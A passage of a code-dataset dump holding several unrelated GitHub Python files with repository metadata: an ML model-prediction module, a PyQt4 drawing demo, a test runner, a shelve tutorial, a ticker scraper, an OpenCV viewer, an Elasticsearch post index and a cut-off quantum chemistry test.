xgboost')\n\n elif model_type == 'clustering':\n\n if model_estimator == 'kmeans':\n trained_model = pickle.load(open(trained_model_path, 'rb'))\n else:\n logger.error(f\"{model_estimator} model is not supported in clustering yet\")\n raise NotImplementedError('Model estimators supported in clustering for now: kmeans')\n\n else:\n logger.error(f\"{model_type} model type is not supported yet\")\n raise NotImplementedError('Model types supported for now: classification and clustering')\n\n return trained_model\n\n\ndef prepare_df_to_predict(data: pd.DataFrame, key_columns: list, model_columns: list = None, normalize: bool = False,\n normalize_method: str = 'robust') -> Union[pd.DataFrame, np.ndarray]:\n \"\"\"\n Prepare dataframe with necessary columns and filters to replicate the model\n\n :param data: dataframe with all variables\n :param key_columns: identifiers like id's that aren't necessary to replicate model\n :param model_columns: column names in the same order in which the model was trained needed to predict\n :param normalize: when set to True, it transforms the numeric features by scaling them to a given range before\n prediction\n :param normalize_method: defines the method for scaling.\n :return: dataframe prepared to replicate model\n \"\"\"\n\n logger.debug('Convert dataframe columns and key columns to lowercase')\n data.columns = map(str.lower, data.columns)\n key_columns = [c.lower() for c in key_columns]\n\n logger.info('Selecting necessary columns to replicate model')\n\n if model_columns is None:\n\n logger.debug(f\"Key columns are {', '.join(key_columns)}\")\n logger.debug('Columns to replicate model are: All columns except key columns')\n\n try:\n replica_data = data.drop(key_columns, axis=1)\n except Exception:\n logger.error(\"Can't drop key columns or identifiers from data\", exc_info=True)\n raise\n else:\n\n model_columns = [c.lower() for c in model_columns]\n logger.debug(f'Columns to replicate model are: {model_columns}')\n\n try:\n replica_data = data[model_columns].copy()\n except Exception:\n logger.error(\"Can't select model columns from data\", exc_info=True)\n raise\n\n # Normalize data if it's necessary\n if normalize:\n replica_data = normalize_data(replica_data, normalize_method)\n replica_data = replica_data.astype('float32') # 
temporary\n\n return replica_data\n\n\ndef predict_model(trained_model: models, model_type: str, model_estimator: str, data: pd.DataFrame) -> np.ndarray:\n \"\"\"\n Predict using trained model\n\n :param trained_model: model object\n :param model_type: classification or clustering\n :param model_estimator: estimator of the model, e.g. lightgbm, xgboost, kmeans\n :param data: dataframe with variables to replicate model\n :return: probabilities resulting from the prediction\n \"\"\"\n\n logger.info('Predicting probabilities for the new data')\n\n try:\n\n if model_type == 'classification':\n\n if model_estimator == 'lightgbm':\n probabilities = trained_model.predict_proba(data)\n model_results = probabilities[:, 1]\n\n elif model_estimator == 'xgboost':\n replica_data_dmatrix = xgb.DMatrix(data)\n model_results = trained_model.predict(replica_data_dmatrix)\n\n else:\n logger.error(f\"{model_estimator} model is not supported in classification yet\")\n raise NotImplementedError('Model estimators supported in classification for now: lightgbm and xgboost')\n\n elif model_type == 'clustering':\n\n if model_estimator == 'kmeans':\n model_results = trained_model.predict(data)\n else:\n logger.error(f\"{model_estimator} model is not supported in clustering yet\")\n raise NotImplementedError('Model estimators supported in clustering for now: kmeans')\n\n else:\n logger.error(f\"{model_type} model type is not supported yet\")\n raise NotImplementedError('Model types supported for now: classification and clustering')\n\n except Exception:\n logger.error(f\"Can't predict {model_estimator} model on new data, please check data quality\", exc_info=True)\n raise\n\n logger.info('Model prediction finished')\n\n return model_results\n\n\ndef common_steps_replica(input_samples: pd.DataFrame, key_columns: list, trained_model_path: str, model_type: str,\n model_estimator: str, model_columns_path: str, normalize: bool = False,\n normalize_method: str = 'robust') -> np.ndarray:\n \"\"\"\n Execute common steps to make single model replica and ensemble model replica\n\n :param input_samples: input samples with all necessary variables to replicate model\n :param key_columns: identifiers like id's that aren't necessary to replicate model\n :param trained_model_path: path of trained model\n :param model_type: classification or clustering\n :param model_estimator: estimator of the model, e.g. 
lightgbm, xgboost, kmeans\n :param model_columns_path: column names in the same order in which the model was trained\n :param normalize: when set to True, it transforms the numeric features by scaling them to a given range before\n prediction\n :param normalize_method: defines the method for scaling.\n :return: array with the model prediction results\n \"\"\"\n # Load the trained model file\n trained_model = load_model(trained_model_path, model_type, model_estimator)\n\n # Read variables to replicate the model\n model_columns = read_variables(model_columns_path)\n\n # Selecting correct columns to replicate model\n replica_data = prepare_df_to_predict(input_samples, key_columns, model_columns, normalize, normalize_method)\n\n # Predict the model on new data\n model_results = predict_model(trained_model, model_type, model_estimator, replica_data)\n\n return model_results\n\n\ndef create_group_column(model_results: np.ndarray, model_type: str, group_columns_type: str, quantile: int,\n fixed_intervals: list, group_labels: Union[list, dict]) -> pd.Series:\n \"\"\"\n Create the group column for each type of model: classification and clustering\n\n :param model_results: output of predict_model\n :param model_type: classification or clustering\n :param group_columns_type: type of group column, e.g. quantile or fixed intervals. Only valid for classification\n :param quantile: number of quantiles. 10 for deciles, 4 for quartiles. If None don't create new column\n :param fixed_intervals: edges to create column with groups based on probabilities. If None don't create new column\n :param group_labels: used as labels for the resulting group column\n :return: series with the group assigned to each prediction\n \"\"\"\n\n logger.info(f'Creating group column for {model_type} model')\n\n if model_type == 'classification':\n groups = discretize_data(model_results, group_columns_type, quantile, fixed_intervals, group_labels)\n\n elif model_type == 'clustering':\n groups = pd.Series(model_results).map(group_labels)\n\n else:\n logger.error(f\"{model_type} model type is not supported yet\")\n raise NotImplementedError('Model types supported for now: classification and clustering')\n\n return groups\n\n\ndef single_model_replica(data: pd.DataFrame, key_columns: list, trained_model_path: str, model_type: str,\n model_estimator: str, filters: str = None, model_columns_path: str = None,\n normalize: bool = False, normalize_method: str = 'robust', add_group_column: bool = True,\n group_columns_type: str = 'quantile', quantile: int = 10, fixed_intervals: list = None,\n group_labels: Union[list, np.ndarray, dict] = None) -> pd.DataFrame:\n \"\"\"\n Model prediction for all samples in replica data\n If model_columns is not specified, it takes all columns except key_columns to replicate the model\n\n :param data: all necessary variables to replicate model\n :param key_columns: identifiers like id's that aren't necessary to replicate model\n :param trained_model_path: path of trained model\n :param model_type: classification or clustering\n :param model_estimator: estimator of the model, e.g. lightgbm, xgboost\n :param filters: filters to query data\n :param model_columns_path: column names in the same order in which the model was trained\n :param normalize: when set to True, it transforms the numeric features by scaling them to a given range before\n prediction\n :param normalize_method: defines the method for scaling.\n :param add_group_column: add rank column based on probabilities\n :param group_columns_type: type of group column, e.g. quantile or fixed intervals\n :param quantile: number of quantiles. 
10 for deciles, 4 for quartiles. If None don't create new column\n :param fixed_intervals: edges to create column with groups based on probabilities. If None don't create new column\n :param group_labels: used as labels for the resulting group column\n :return: dataframe with probabilities and key columns\n \"\"\"\n\n # Filter dataframe if it's necessary\n if filters is not None:\n\n logger.info(f'Applying filters to dataframe : {filters}')\n filtered_data = data.query(filters).reset_index(drop=True)\n\n logger.info(f'New dataframe shape is {filtered_data.shape}')\n\n else:\n filtered_data = data\n\n # Keep only key columns\n replica_result = filtered_data[key_columns].copy()\n\n # Execute common steps replica\n model_results = common_steps_replica(input_samples=filtered_data, key_columns=key_columns,\n trained_model_path=trained_model_path, model_type=model_type,\n model_estimator=model_estimator, model_columns_path=model_columns_path,\n normalize=normalize, normalize_method=normalize_method)\n\n # Add replica column to results\n replica_result['final_prob'] = model_results\n\n # Add group column\n if add_group_column:\n\n logger.info(\"Adding column group to model result\")\n replica_result['groups'] = create_group_column(model_results, model_type, group_columns_type, quantile,\n fixed_intervals, group_labels)\n\n return replica_result\n\n\ndef ensemble_model_replica(data: pd.DataFrame, models_data: dict, key_columns: list) -> pd.DataFrame:\n \"\"\"\n Generate prediction for ensemble models\n\n :param data: dataframe with all necessary variables to replicate each model\n :param models_data: model path, variables path, model type and weight of each model\n :param key_columns: identifiers like id's that aren't necessary to replicate model\n :return: dataframe with probabilities for each model and final probability\n \"\"\"\n\n # Filter dataframe if it's necessary\n if models_data.get('filter_rows') is not None:\n\n filters = models_data['filter_rows']['query']\n\n logger.info(f'Applying filters to dataframe : {filters}')\n filtered_data = data.query(filters).reset_index(drop=True)\n logger.debug(f'New dataframe shape is {filtered_data.shape}')\n else:\n filtered_data = data\n\n # Create dataframe to add all the probabilities as columns\n ensemble_replica_result = filtered_data[key_columns].reset_index(drop=True)\n ensemble_probabilities = np.zeros(ensemble_replica_result.shape[0])\n\n # Iterate over through all models\n for model_name, model_data in models_data['inner_models'].items():\n\n logger.info(f'Making replica of {model_name} model')\n\n # Execute common steps replica\n probabilities = common_steps_replica(input_samples=filtered_data, key_columns=key_columns,\n trained_model_path=model_data['model_path'],\n model_type=model_data['model_type'],\n model_estimator=model_data['model_estimator'],\n model_columns_path=model_data['model_variables'])\n\n # Add prediction as a column\n prob_column_name = 'prob_' + model_name\n ensemble_replica_result[prob_column_name] = probabilities\n\n # Create ensemble probabilities\n ensemble_probabilities += probabilities * model_data['model_weight']\n\n # Add column with final probability\n ensemble_replica_result['final_prob'] = ensemble_probabilities\n\n # Add group column\n if models_data['add_group_column']:\n groups = discretize_data(array=ensemble_probabilities,\n q=models_data.get('quantile'),\n bin_type=models_data.get('group_column_type'),\n bins=models_data.get('probability_cuts'),\n labels=models_data.get('labels'))\n 
ensemble_replica_result['groups'] = groups\n\n return ensemble_replica_result\n\n\ndef merge_model_results(model_results: dict, key_columns: list, merge_type: str) -> pd.DataFrame:\n \"\"\"\n Merge model results into one dataframe\n\n :param model_results: dictionary of model results keyed by model name\n :param key_columns: identifiers like id's that aren't necessary to replicate models\n :param merge_type: {'same_population', 'different_population'}\n :return: merged results\n \"\"\"\n\n if merge_type == 'same_population':\n\n # Create a variable to identify the first item of the dict\n first_item = True\n\n logger.info(\"Merging model results of the same population\")\n\n for model_name, results in model_results.items():\n\n # Keep the key columns only for the first model result\n if first_item:\n model_results[model_name].columns = key_columns + ['prob_' + model_name, 'groups_' + model_name]\n first_item = False\n continue\n\n # Drop key columns for all model results except the first one\n model_results[model_name].drop(key_columns, axis=1, inplace=True)\n\n # Rename probability and group columns\n model_results[model_name].columns = ['prob_' + model_name, 'groups_' + model_name]\n\n merged_results = pd.concat(list(model_results.values()), axis=1)\n\n elif merge_type == 'different_population':\n\n logger.info(\"Merging model results of different populations\")\n\n merged_results = pd.concat(list(model_results.values())).reset_index(drop=True)\n\n else:\n raise NotImplementedError('Merge types supported for now: same_population and different_population')\n\n return merged_results\n\n\ndef replicate_all_models(data: pd.DataFrame, key_columns: list, conf_replica_models_path: str) -> pd.DataFrame:\n \"\"\"\n Replicate all models in configuration models file\n\n :param data: dataframe with all necessary variables to replicate all models\n :param key_columns: identifiers like id's that aren't necessary to replicate models\n :param conf_replica_models_path: path to replica configuration file with all models parameters\n :return: dataframe with the union of all replicas\n \"\"\"\n\n # Read configuration parameters from yaml file\n conf_replica_models = read_configuration_file(conf_replica_models_path)\n\n # Dictionary with all results of models\n results = dict()\n\n # Replicate all models\n for model_name, model_data in conf_replica_models['models'].items():\n\n logger.info(f'Starting replica of {model_name} model')\n\n if model_data['ensemble_model']:\n ensemble_results = ensemble_model_replica(data=data,\n models_data=model_data,\n key_columns=key_columns)\n results[model_name] = ensemble_results[key_columns + ['final_prob', 'groups']].copy()\n else:\n results[model_name] = single_model_replica(data=data, key_columns=key_columns,\n trained_model_path=model_data['model_path'],\n model_type=model_data['model_type'],\n model_estimator=model_data['model_estimator'],\n filters=model_data.get('filter_rows', {}).get('query'),\n model_columns_path=model_data['model_variables'],\n normalize=model_data.get('normalize_data'),\n normalize_method=model_data.get('normalize_method'),\n add_group_column=model_data.get('add_group_column'),\n group_columns_type=model_data.get('group_column_type'),\n quantile=model_data.get('quantile'),\n fixed_intervals=model_data.get('probability_cuts'),\n group_labels=model_data.get('labels'))\n\n logger.info('Replication of all models finished')\n\n # Union all dataframes\n logger.info('Union all dataframes with results')\n merge_type = 
conf_replica_models.get('merge_type', 'different_population')\n total_replica_results = merge_model_results(results, key_columns, merge_type)\n\n return total_replica_results\n","repo_name":"advanced-analytics-tdp/execution-framework","sub_path":"execution_framework/model_prediction.py","file_name":"model_prediction.py","file_ext":"py","file_size_in_byte":19201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"8743335097","text":"# -*- coding: utf-8 -*-\nfrom PyQt4 import QtCore, QtGui\n\n\nclass MyWindow(QtGui.QWidget):\n def __init__(self, parent=None):\n QtGui.QWidget.__init__(self, parent)\n self.resize(300, 300)\n\n def paintEvent(self, e):\n painter = QtGui.QPainter(self)\n black = QtCore.Qt.black\n white = QtCore.Qt.white\n red = QtCore.Qt.red\n painter.setPen(QtGui.QPen(black))\n painter.setBrush(QtGui.QBrush(white))\n painter.drawRect(3, 3, 294, 294)\n\n painter.setPen(QtGui.QPen(red, 1))\n painter.setFont(QtGui.QFont(\"Tahoma\", 12))\n\n painter.drawRect(QtCore.QRect(20, 40, 260, 200))\n textOption = QtGui.QTextOption(QtCore.Qt.AlignCenter)\n textOption.setFlags(QtGui.QTextOption.ShowTabsAndSpaces)\n painter.drawText(QtCore.QRectF(20., 40., 260., 200.),\n \"All\\tspecial characters are shown \",\n option=textOption)\n\n print(painter.boundingRect(20, 100, 260, 30,\n QtCore.Qt.AlignCenter | QtCore.Qt.TextShowMnemonic,\n \"Line &1\"))\n\n print(painter.boundingRect(QtCore.QRect(20, 140, 260, 50),\n QtCore.Qt.AlignRight | QtCore.Qt.TextSingleLine,\n \"Line 2\\nall special characters are treated as spaces and the text is printed on a single line\"))\n\n print(painter.boundingRect(QtCore.QRectF(20., 190., 260., 50.),\n QtCore.Qt.AlignRight | QtCore.Qt.TextWordWrap,\n \"Line 3 a very long text on two lines\"))\n\n print(painter.boundingRect(QtCore.QRectF(20., 40., 260., 200.),\n \"All\\tspecial characters are shown \",\n option=textOption))\n\n\nif __name__ == \"__main__\":\n import sys\n\n app = QtGui.QApplication(sys.argv)\n window = MyWindow()\n window.setWindowTitle(\"The QPainter class\")\n window.show()\n sys.exit(app.exec_())","repo_name":"syurskyi/Python_Topics","sub_path":"140_gui/pyqt_pyside/examples/PyQt_PySide_book/006_Working with graphics/002_Class_QPainter/533. boundingRect.py","file_name":"533. 
boundingRect.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"44008562603","text":"import sys\nimport subprocess\nimport itertools\n\ntests = ( list(itertools.product(\n [\"unittest_optimizer\"],\n [1,2,4,15,50])) + \n [ (\"unittest_parser\",\"\") ] )\n\nfirst = True\nsuccess = True\nfor a,b in tests:\n if not first:\n print(\"\\n\\n\",flush=True)\n first = False\n args = [\"python3\",\"-m\",\"drug_cycling.tests.\"+a,\n str(b)]\n sargs = \" \".join(args)\n print(\"*\"*(len(sargs)+5),flush=True)\n print(\"With\",sargs,flush=True)\n print(\"*\"*(len(sargs)+5),flush=True)\n print(\"\\n\\n\",flush=True)\n res = subprocess.run(args).returncode\n if res != 0:\n print(\"Failed at {} {}\".format(a,b),\n file=sys.stderr)\n success = False\n\nif success:\n print(\"\\n\\nEverything went well\")\nelse:\n print(\"\\n\\nSomething went wrong\")\n","repo_name":"devingreene/drug_cycling","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4186367504","text":"import cv2 as cv\n\nfrom vboa.loadres.image_loader import ImageLoader, ImagesLoader\n\nESC_KEY_CODE = 27\n\n\ndef run_app(img_file: str | None, imgs_dir: str | None) -> None:\n if img_file:\n raw_data_img = ImageLoader.load(img_file)\n cv.imshow(winname='Image', mat=raw_data_img)\n elif imgs_dir:\n raw_data_images = ImagesLoader.load(imgs_dir)\n for file_name, raw_data in raw_data_images.items():\n cv.imshow(winname=f'Image {file_name}', \n mat=raw_data)\n else:\n cv.namedWindow(\"Blank\", cv.WINDOW_AUTOSIZE)\n\n key_code = cv.waitKey(0)\n if key_code == ESC_KEY_CODE:\n cv.destroyAllWindows()\n","repo_name":"Diklofozzz1/vision-based-obstacle-avoidance-system","sub_path":"vboa/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"33477785745","text":"#! 
/usr/bin/env python\n# -*- coding: utf-8 -*-\n# __author__ = \"Q1mi\"\n\n\"\"\"\nThe shelve module\nThe difference from pickle: with pickle you dump multiple times and then load the objects back in the same order.\nWith shelve you open the file once and read values by key\n\"\"\"\n\nimport shelve\n\n\n# Define a test class\nclass TestDemo(object):\n\tdef __init__(self, n):\n\t\tself.n = n\n\nt = TestDemo(123)\n\nname = [\"alex\", \"john\", \"eric\"]\n\nd = shelve.open(\"test3\")\n\nd[\"test1\"] = name # persist a list\nd[\"test2\"] = {\"a\": 1, \"b\": 2, \"c\": 3} # persist a dict\nd[\"test3\"] = t # persist a class instance\n\nd.close()\n\np = shelve.open(\"test3\")\nprint(p[\"test1\"])\ntemp = p.get(\"test3\")\nprint(temp.n)\np.close()\n","repo_name":"chenjinpeng1/S12","sub_path":"day5/shelve_ex.py","file_name":"shelve_ex.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"26547716197","text":"import shutil\nfrom datetime import datetime\nfrom typing import Optional, List, Literal, Sequence, NamedTuple\n\nfrom django.conf import settings\nfrom elasticsearch import exceptions\n\nfrom elasticsearch_control import (\n AbstractIndex,\n ElasticsearchPaginator,\n QueryLimitParams,\n)\nfrom elasticsearch_control.transport import elasticsearch_connector\nfrom taged_web.helpers import icon_path\n\nT_Values = Literal[\"title\", \"content\", \"tags\", \"published_at\"]\n\n\nclass PostFile(NamedTuple):\n name: str\n icon: str\n\n\nclass PostIndex(AbstractIndex):\n title: str\n content: str\n tags: str\n published_at: datetime\n\n class Meta:\n index_name = \"company\"\n connector = elasticsearch_connector\n settings = {\n \"analysis\": {\n \"filter\": {\n \"ru_stop\": {\"type\": \"stop\", \"stopwords\": \"_russian_\"},\n \"ru_stemmer\": {\"type\": \"stemmer\", \"language\": \"russian\"},\n },\n \"analyzer\": {\n \"default\": {\n \"char_filter\": [\"html_strip\"],\n \"tokenizer\": \"standard\",\n \"filter\": [\"lowercase\", \"ru_stop\", \"ru_stemmer\"],\n }\n },\n }\n }\n\n @property\n def tags_list(self) -> List[str]:\n if isinstance(self.tags, str):\n return self.tags.split(\", \")\n if isinstance(self.tags, list):\n return self.tags\n\n def json(self) -> dict:\n return {\n \"title\": self.title,\n \"tags\": self.tags_list,\n \"published_at\": self.published_at,\n \"content\": self.content,\n }\n\n @classmethod\n def get(\n cls, id_: str, values: Optional[Sequence[T_Values]] = None, **kwargs\n ) -> Optional[\"PostIndex\"]:\n \"\"\"\n Return the note if it was found, otherwise `None`.\n\n :param id_: The note identifier.\n :param values: A list of fields whose values are needed for the returned note.\n :param kwargs: Additional search parameters.\n :return: A `PostIndex` object or `None`.\n \"\"\"\n\n # If specific fields to return were requested, build the extra query parameters\n extra = {\"_source\": values} if values else {}\n # Call the parent `get` method\n response = super().get(id_=id_, **extra, **kwargs)\n\n if response is not None and response.get(\"_source\"): # If we got a response\n post = PostIndex()\n data: dict = response[\"_source\"]\n\n # If the tags were received as a list, convert them into a tag string separated by `, `\n if data.get(\"tags\") and isinstance(data[\"tags\"], list):\n data[\"tags\"] = \", \".join(data[\"tags\"])\n\n post.id = id_\n post.title = data.get(\"title\", \"\")\n post.content = data.get(\"content\", \"\")\n post.tags = data.get(\"tags\", \"\")\n\n if data.get(\"published_at\"):\n # If a date was passed, build the datetime object from the string based on the following 
\n @classmethod\n def create(cls, title: str, tags: List[str], content: str) -> Optional[\"PostIndex\"]:\n \"\"\"\n Creates a new post and returns it.\n\n :param title: Title.\n :param tags: List of tags.\n :param content: Body content.\n :return: The post if it was created, otherwise None.\n \"\"\"\n\n post = PostIndex()\n post.title = title\n post.tags = \", \".join(tags)\n post.content = content\n post.published_at = datetime.now()\n try:\n result = cls.Meta.connector.es.index(\n index=cls.Meta.index_name,\n document=post.json(),\n request_timeout=cls.Meta.connector.timeout,\n )\n except exceptions.ElasticsearchException:\n return None\n post.id = result.get(\"_id\", \"\")\n return post\n\n def delete(self) -> bool:\n \"\"\"\n Deleting a post also deletes every file attached to it\n \"\"\"\n\n if (settings.MEDIA_ROOT / self.id).exists():\n # If there are attached files\n shutil.rmtree(settings.MEDIA_ROOT / self.id)\n return super().delete()\n\n @classmethod\n def filter(\n cls,\n tags_in: List[str] = None,\n tags_off: List[str] = None,\n string: str = \"\",\n values: Optional[Sequence[T_Values]] = None,\n sort: T_Values = None,\n sort_desc: bool = False,\n ) -> ElasticsearchPaginator:\n \"\"\"\n Returns the list of posts that match the filter.\n\n :param tags_in: Tags that a post must have.\n :param tags_off: Tags that a post must not have.\n :param string: Substring search in title and content.\n :param values: List of fields to return for each post, or `None` to return all fields.\n :param sort: Field to sort by; no sorting by default.\n :param sort_desc: Reverse the sort order?\n :return: `ElasticsearchPaginator`.\n \"\"\"\n\n # Use tags_off as given, otherwise fall back to an empty list.\n tags_off = tags_off if tags_off else []\n # Use tags_in as given, otherwise fall back to an empty list.\n tags_in = tags_in if tags_in else []\n\n # Tags always have to be returned\n if values is None:\n values = [\"title\", \"content\", \"tags\", \"published_at\"]\n if \"tags\" not in values:\n values.append(\"tags\")\n\n # Build the sort parameter if one was given\n sort_parameter = {sort: \"desc\" if sort_desc else \"asc\"} if sort else None\n\n query_params = QueryLimitParams(\n index=cls.Meta.index_name,\n source=values,\n query={\"bool\": {\"must\": []}},\n sort=sort_parameter,\n request_timeout=cls.Meta.connector.timeout,\n )\n\n # If tags_in is not empty, filter by those tags.\n if tags_in:\n query_params.query[\"bool\"][\"must\"].append(\n {\n \"match\": {\"tags\": \" \".join(tags_in)},\n }\n )\n\n # Substring search in title and content\n if string:\n query_params.query[\"bool\"][\"must\"].append(\n {\n \"simple_query_string\": {\n \"query\": string,\n \"fields\": [\"title^2\", \"content\"],\n }\n }\n )\n\n if tags_off:\n query_params.query[\"bool\"][\"must_not\"] = [\n {\n \"match\": {\"tags\": \" \".join(tags_off)},\n }\n ]\n\n return ElasticsearchPaginator(\n es=cls.Meta.connector.es,\n params=query_params,\n convert_result=cls._convert_post_result,\n # extra\n tags_in=tags_in,\n tags_off=tags_off,\n )\n
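\n # Illustrative filter call (comments only; the tag and query values are assumed examples):\n # page = PostIndex.filter(tags_in=[\"linux\"], string=\"nginx\", sort=\"published_at\", sort_desc=True)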
\n @staticmethod\n def _convert_post_result(res, tags_in, tags_off) -> List[dict]:\n # max_score is the highest score among all hits in the response.\n max_score = float(res[\"hits\"][\"max_score\"] or 1)\n result = []\n # Check whether the response contains at least one hit.\n if res and res[\"hits\"][\"total\"][\"value\"]:\n for post in res[\"hits\"][\"hits\"]:\n if isinstance(post[\"_source\"][\"tags\"], str):\n # Wrap a single tag into a one-element list\n post[\"_source\"][\"tags\"] = [post[\"_source\"][\"tags\"]]\n # Keep the post only if every required tag (tags_in) occurs in it and\n # none of the unwanted tags (tags_off) do.\n # The intersection of the post's tags with the search tags must equal the search tags (i.e. the post contains all of them)\n if (\n not tags_in\n or sorted(list(set(post[\"_source\"][\"tags\"]) & set(tags_in)))\n == sorted(tags_in)\n ) and (\n not tags_off or not set(post[\"_source\"][\"tags\"]) & set(tags_off)\n ):\n result.append(\n {\n \"id\": post[\"_id\"],\n \"title\": post[\"_source\"].get(\"title\"),\n \"tags\": post[\"_source\"].get(\"tags\"),\n \"published_at\": post[\"_source\"].get(\"published_at\"),\n \"content\": post[\"_source\"].get(\"content\"),\n \"score\": round(float(post[\"_score\"] or 0) / max_score, 3),\n }\n )\n return result\n\n @classmethod\n def get_titles(cls, string: str, unavailable_tags: List[str]) -> List[str]:\n \"\"\"\n ## Returns the titles that match the search string.\n\n :param string: Search string.\n :param unavailable_tags: Tags that are unavailable to the user.\n :return: List of titles that match the substring, or an empty list.\n \"\"\"\n\n # Substring search in the title\n res = cls.Meta.connector.es.search(\n index=cls.Meta.index_name,\n _source=[\"title\", \"tags\"],\n query={\n \"bool\": {\n \"must\": [\n {\n \"simple_query_string\": {\n \"query\": string,\n \"fields\": [\"title^2\"],\n }\n }\n ],\n \"must_not\": [\n {\"match\": {\"tags\": \" \".join(unavailable_tags)}},\n ],\n }\n },\n request_timeout=cls.Meta.connector.timeout,\n )\n # Check whether the response contains at least one hit.\n if res[\"hits\"][\"total\"][\"value\"]:\n return [line[\"_source\"][\"title\"] for line in res[\"hits\"][\"hits\"]]\n else:\n return []\n\n def get_files(self) -> List[PostFile]:\n \"\"\"\n ## Returns the list of files attached to the post\n\n :return: List of files\n \"\"\"\n\n files = []\n # If a folder exists for this post id and it contains files\n for f in (settings.MEDIA_ROOT / self.id).glob(\"*\"):\n if f.is_file():\n # Add the file name plus its icon to the list\n files.append(\n PostFile(name=f.name, icon=icon_path(f.name)),\n )\n return files\n\n @classmethod\n def tags_count(cls, tag_name: str):\n return cls.Meta.connector.es.count(\n index=cls.Meta.index_name,\n body={\"query\": {\"match\": {\"tags\": tag_name}}},\n request_timeout=settings.ELASTICSEARCH_TIMEOUT,\n )[\"count\"]\n","repo_name":"ig-rudenko/taged","sub_path":"taged_web/es_index.py","file_name":"es_index.py","file_ext":"py","file_size_in_byte":13186,"program_lang":"python","lang":"ru","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"33866584810","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 18 09:34:22 2019\n\n@author: Kaushik\n\"\"\"\n\nimport pandas as pd\n\nglobal tickers\n\ndata = pd.read_html('https://en.wikipedia.org/wiki/List_of_S%26P_500_companies')\ntable = data[0]\n#print(table.head())\nsliced_table = table[1:]\nheader = table.iloc[0]\ncorrected_table = sliced_table.rename(columns=header)\n#print(corrected_table)\ntickers 
= corrected_table['Symbol'].tolist()\n#print (tickers)","repo_name":"kadharamkaushik/visualization_exam","sub_path":"q1_splist.py","file_name":"q1_splist.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70251821924","text":"# EOM CCSD\nimport os\nimport sys\n\nimport qcdb\n\nfrom ..utils import *\n\n\ndef check_eomccsd(return_value):\n ref = -75.633713836043\n ccsd_tot = -75.942608958748735\n ccsd_corl = -0.308895122705897\n root1_exc = 0.317644190387170\n root1_tot = -75.89014254\n root2_exc = 0.399118315871657\n root2_tot = -75.80866841\n root3_exc = 0.419648919776505\n root3_tot = -75.78813781\n root4_exc = 0.505153089073363\n root4_tot = -75.70263364\n root5_exc = 0.569331468468014\n root5_tot = -75.63845526\n root6_exc = 0.695937098625459\n root6_tot = -75.51184963\n root7_exc = 0.995506121301140\n root7_tot = -75.21228061\n root8_exc = 1.018576341192903\n root8_tot = -75.18921039\n root9_exc = 1.048599044061786\n root9_tot = -75.15918769\n root10_exc = 1.072014344987968\n root10_tot = -75.13577239\n root11_exc = 1.123688743818949\n root11_tot = -75.08409799\n root12_exc = 1.128736537578306\n root12_tot = -75.07905019\n\n # add all excited states being tested\n assert compare_values(ref, qcdb.variable(\"HF TOTAL ENERGY\"), 6, \"hf ref\")\n assert compare_values(ccsd_tot, qcdb.variable(\"CCSD TOTAL ENERGY\"), 6, \"ccsd tot\")\n assert compare_values(ccsd_corl, qcdb.variable(\"CCSD CORRELATION ENERGY\"), 6, \"ccsd corl\")\n assert compare_values(\n root1_exc, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 1 EXCITATION ENERGY - B1 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 1 ext\"\n )\n assert compare_values(\n root1_tot, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 1 TOTAL ENERGY - B1 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 1 total\"\n )\n assert compare_values(\n root2_exc, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 2 EXCITATION ENERGY - A2 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 2 ext\"\n )\n assert compare_values(\n root2_tot, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 2 TOTAL ENERGY - A2 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 2 total\"\n )\n assert compare_values(\n root3_exc, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 3 EXCITATION ENERGY - A1 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 3 ext\"\n )\n assert compare_values(\n root3_tot, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 3 TOTAL ENERGY - A1 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 3 total\"\n )\n assert compare_values(\n root4_exc, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 4 EXCITATION ENERGY - B2 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 4 ext\"\n )\n assert compare_values(\n root4_tot, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 4 TOTAL ENERGY - B2 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 4 total\"\n )\n assert compare_values(\n root5_exc, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 5 EXCITATION ENERGY - B2 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 5 ext\"\n )\n assert compare_values(\n root5_tot, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 5 TOTAL ENERGY - B2 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 5 total\"\n )\n assert compare_values(\n root6_exc, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 6 EXCITATION ENERGY - A1 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 6 ext\"\n )\n assert compare_values(\n root6_tot, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 6 TOTAL ENERGY - A1 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 6 total\"\n )\n assert compare_values(\n root7_exc, qcdb.variable(\"EOM-CCSD ROOT 0 